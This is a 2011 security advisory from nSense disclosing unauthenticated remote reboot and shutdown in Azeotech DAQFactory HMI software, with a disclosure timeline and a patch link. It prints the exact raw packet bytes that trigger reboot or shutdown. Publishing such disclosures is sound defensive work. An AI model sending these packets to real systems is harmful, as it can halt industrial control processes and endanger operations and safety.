nSense Vulnerability Research Security Advisory - The default configuration in Azeotech DAQFactory allows network connections towards the HMI without authentication. This allows an attacker on the network to shut down the machine running the HMI software by sending a simple packet.
8a08b9d43fbf3ae9966c1c2359f63e48b085f95564403cf9d414af76d275d1b5
nSense Vulnerability Research Security Advisory NSENSE-2011-004
---------------------------------------------------------------
Affected Vendor: Azeotech
Affected Product: DAQFactory
Platform: Windows
Impact: Remote reboot/shutdown
Vendor response: Patch
CVE: None
Credit: Knud / nSense
Technical details
---------------------------------------------------------------
The default configuration allows network connections towards
the HMI without authentication. This allows an attacker on the
network to shut down the machine running the HMI software by
sending a packet as outlined below:
preamble:
"\x01\x00\x09\x00CPassword\x00"
reboot:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"
shutdown:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"
Timeline:
20110412 Contacted ICS-CERT
20110413 ICS-CERT acknowledges receipt of information
20110413 ICS-CERT creates ticket,# ICS-VU-240775
20110502 Vendor creates patch, releases advisory to customers
20110625 ICS-CERT releases advisory
20110727 Vendor responds, CVE assigned, patch 20110809
Solution
Install the latest version from the vendor:
http://www.azeotech.com/downloads.php
Links:
http://www.nsense.fi http://www.nsense.dk
$$s$$$$s. ,s$$$$s ,S$$$$$s. $$s$$$$s. ,s$$$$s ,S$$$$$s.
$$$ `$$$ ($$( $$$ `$$$ $$$ `$$$ ($$( $$$ `$$$
$$$ $$$ `^$$s. $$$$$$$$$ $$$ $$$ `^$$s. $$$$$$$$$
$$$ $$$ )$$) $$$ $$$ $$$ )$$) $$$
$$$ $$$ ^$$$$$$7 `7$$$$$P $$$ $$$ ^$$$$$$7 `7$$$$$P
D r i v e n b y t h e c h a l l e n g e _